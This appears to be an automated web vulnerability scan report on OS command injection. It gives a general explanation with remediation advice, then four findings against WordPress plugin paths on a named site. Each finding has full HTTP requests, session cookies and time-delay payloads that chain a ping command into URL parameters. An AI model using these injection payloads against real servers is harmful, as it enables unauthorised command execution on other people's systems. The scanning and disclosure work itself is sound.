Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated into executing commands other than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defence can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defences.
The REST URL parameter 5 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the REST URL parameter 5. The application took 52604 milliseconds to respond to the request, compared with 468 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js|ping%20-n%2020%20127.0.0.1||x HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the REST URL parameter 2. The application took 62088 milliseconds to respond to the request, compared with 94 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins|ping%20-c%2020%20127.0.0.1||x/seo-pressor/templates/css/styles.css HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;
The REST URL parameter 3 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the REST URL parameter 3. The application took 56379 milliseconds to respond to the request, compared with 375 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins/superslider|ping%20-n%2020%20127.0.0.1||x/plugin-data/superslider/ssBase/blue/accordion.css HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;
The REST URL parameter 4 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the REST URL parameter 4. The application took 44273 milliseconds to respond to the request, compared with 484 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins/wp-prettyphoto/js%26ping%20-n%2020%20127.0.0.1%26/jquery.prettyPhoto.js HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;